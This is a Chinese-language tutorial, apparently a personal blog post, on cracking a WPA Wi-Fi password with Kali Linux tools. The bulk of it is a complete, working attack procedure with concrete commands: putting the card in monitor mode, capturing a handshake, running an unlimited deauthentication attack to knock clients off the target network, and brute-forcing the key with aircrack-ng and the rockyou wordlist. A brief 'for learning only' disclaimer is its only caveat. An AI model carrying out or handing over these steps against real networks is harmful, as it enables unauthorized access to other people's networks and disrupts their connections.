Kali-WIFI密码(字典)

`仅供学习，勿滥用，网络不是法外之地`

## 准备工作
需要有个`Kali`系统，虚拟机的需要外置USB网卡

## 抓包
### 查看无线网卡
`airmon-ng`
![](/media/202212/image-8ee459e7fa19416ab3413e5858f9e1e1.png)
记下网卡名称
> 列出支持`监控模式`的无线网卡，如果没有任何输出，则表示无线网卡均不支持监控模式

### 开启监听模式
```
# 关闭其他监听
airmon-ng check kill

# 开启 waln0 监听模式
airmon-ng start wlan0
```
![](/media/202212/image-944baf0c364f4d6987f1e5553ff276cd.png)
可以使用 `ifconfig` 查看网卡名称是否改变

### 扫描 WIFI
`airodump-ng wlan0mon`
找到目标wifi，使用 <kbd>Ctrl</kbd>+<kbd>C</kbd> 停止扫描

* BSSID —— AP端的mac地址
 * PWR —— 信号强度(绝对值越小，信号越强)
 * Data —— 对应路由器的在线数据吞吐量，数值越大，数值上传量越大
 * CH —— 对应路由的频道
 * ESSID —— 对应路由器的名称

### 抓握手包
```
airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon

# airodump-ng -c <AP信道> -w <握手包路径> --bssid <AP的mac地址> <网卡>
```
![](/media/202212/image-b860f3a96fe042c99ce95477b6dcd444.png)
需要有设备重新连接才可以抓取到

#### 强制解除认证
新开个命令窗，强制让连接的设备断开重连
```
aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon

# aireplay-ng -<攻击模式，持续攻击(0)> [攻击次数，0为无限] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <网卡>
```
> 如果攻击时提示信道不对，是因为监听时会频繁更换信道，多试几次就行了

![](/media/202212/image-06926b2bec7f4abfaa3013f78bb3821b.png)
当显示 `WPA hankshake` 表示成功抓到握手包，将两个命令框都输入 `Ctrl + C` 终止攻击和握手抓包
![](/media/202212/image-b9d9aba039294849bafdedc5c8253593.png)
抓到的握手包会存在填写的路径下

### 关闭网卡监听
`airmon-ng stop wlan0mon`

## 字典破密
Kali自带一份字典，需要先解压，如果自己有更好了
`gzip -d /usr/share/wordlists/rockyou.txt.gz`

暴力破解
```
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap
# aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>
```
然后就是无尽的等待，速度跟人品和CPU有关

![](/media/202212/image-b2901d036abc4df997b12ed5adc29131.png)
成功后，如图区域会显示 KEY FOUND![密码]

> 推荐根据了解到的信息自定义个比较符合的字典(如WIFI密码肯定是8位起)
> 跑码还可以把`.cap`文件拷贝到Win下跑码
> 路径：/共享盘/创客/Kali